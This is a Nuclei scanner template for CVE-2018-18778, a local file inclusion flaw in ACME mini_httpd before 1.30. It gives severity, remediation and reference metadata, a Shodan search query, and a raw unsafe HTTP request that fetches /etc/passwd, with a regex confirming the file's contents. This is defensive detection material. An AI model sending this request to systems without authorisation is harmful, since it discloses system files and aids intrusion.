nuclei-templates/http/cves/2018/CVE-2018-18778.yaml

58 lines
1.6 KiB
YAML

id: CVE-2018-18778
info:
name: ACME mini_httpd <1.30 - Local File Inclusion
author: DhiyaneshDK,dogasantos
severity: medium
description: ACME mini_httpd before 1.30 is vulnerable to local file inclusion.
impact: |
Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server.
remediation: |
Upgrade ACME mini_httpd to version 1.30 or later to mitigate this vulnerability.
reference:
- https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/
- http://www.acme.com/software/mini_httpd/
- https://nvd.nist.gov/vuln/detail/CVE-2018-18778
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2018-18778
cwe-id: CWE-200
epss-score: 0.95125
epss-percentile: 0.99135
cpe: cpe:2.3:a:acme:mini-httpd:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: acme
product: mini-httpd
shodan-query: 'Server: mini_httpd && 200'
tags: cve,cve2018,lfi,mini_httpd,acme
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
part: header
words:
- "Server: mini_httpd"
- raw:
- |+
GET /etc/passwd HTTP/1.1
Host:
unsafe: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 490a00463044022038468c968d47ad446ab1cfd510be13223851e833702af08f2fa19e3b2d55cdf302204986bdaf5d56697ea6883a2cbe86d964f6f99ef709a39b20e0150649ba870f27:922c64590222798bb761d5b6d8e72950